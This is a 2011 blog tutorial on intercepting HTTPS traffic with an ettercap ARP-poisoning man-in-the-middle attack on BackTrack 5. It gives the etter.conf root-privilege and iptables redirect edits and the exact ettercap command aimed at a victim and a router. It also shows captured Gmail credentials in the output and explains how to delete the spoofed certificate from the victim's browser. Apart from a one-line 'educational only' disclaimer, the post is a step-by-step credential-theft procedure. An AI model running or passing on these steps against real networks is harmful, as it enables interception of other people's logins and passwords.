Saturday, May 28, 2011

HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational only. Do NOT carry out the following steps on a LAN that without permission. Otherwise, you will be put into the jail. ***

Sniffing SSL (https) traffic on LAN with ettercap by mean of Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the change as the following :

[privs]
ec_uid = 0    # nobody is the default
ec_gid = 0    # nobody is the default


Uncomment the following :

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


Step 2 :

Victim's machine is at 192.168.1.100 while the router is at 192.168.1.1. Attacker is at 192.168.1.115.

ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

The outcome of the display is as the following :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 72)
Listening on eth0... (Ethernet)

eth0 ->    08:00:27:FF:95:DB    192.168.1.115 255.255.255.0

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |=================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A

GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help


Step 3 :

At the victim's machine, open a browser, such as Firefox and go to GMail. You will be asked to accept an untrusted certification. Just accept the certificate and you will be directed to the login screen of GMail.

When the victim login to the GMail, his/her username and password will be logged on the Attacker's machine. The display will be similar to the following :

HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

You will find that USER: samiux and PASS: password.

Remarks :

To delete the untrusted certificate on Firefox at victim's machine : "Edit" -- "Perference" -- "View Certificate List" -- "Server". You will find something like the following. You just delete them all.

Thawte Consulting (Pty) Ltd.
www.google.com www.google.com:443 forever 2011-09-21
www.google.com mail.google.com:443 forever 2011-09-21


In general, GMail will not ask you to accept any certificate, especially untrusted one.

That's all! See you.